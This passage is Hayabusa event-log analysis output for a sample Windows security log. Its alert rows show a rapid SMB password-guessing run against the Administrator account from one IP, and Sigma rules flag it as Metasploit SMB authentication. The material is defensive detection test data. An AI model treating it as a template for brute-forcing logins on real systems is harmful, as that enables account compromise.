NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lRVetRdHvz0lJkOC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yXrtxquzyzxKnQgD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWOoEIEem7Q9Mdx0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 86n5nIm04810NptD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M08noHtTqqx3pxSe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3P983pRVfCVlVTyA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: eMKlcLvRhlx9FMcZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0gwEDgRF2wUgTDAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9Q2GSALfiuEbulo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.780 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DKTja76Qe9vSjrdN : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.824 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXuUyKlvaOgMNSu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.868 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X3qdEQReXwHAZUS8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.904 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FqtfHJKOfmWXEd4s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVv7vete3uXixggi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0PF6E3wRP0Tk39ss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: touwF4IXUahG7jvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.106 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lMOi7rygc7SJ5TPQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.161 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QjM1K5eFSA9U37oE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HgzyZqFU9v2kDVvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.258 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hJeVj2h0sBxwBuGv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FNXI8b6Zcj1zU3JY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.355 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: q9DyH9oxFbRTCQ80 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.408 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5LZo1ljGLOVKhwcC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.458 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GvY6Q7RGKwjehARC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.556 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uKLrHVMevqniTck8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldxglvKFhLJQ3FV3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.645 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: lRHIAxIj9wFRIg67 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.685 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mc7nvfyDfWpnhhBx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB7Y4gPbxose5TsQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yKFU6DJ8Wdtp2qdC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.806 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
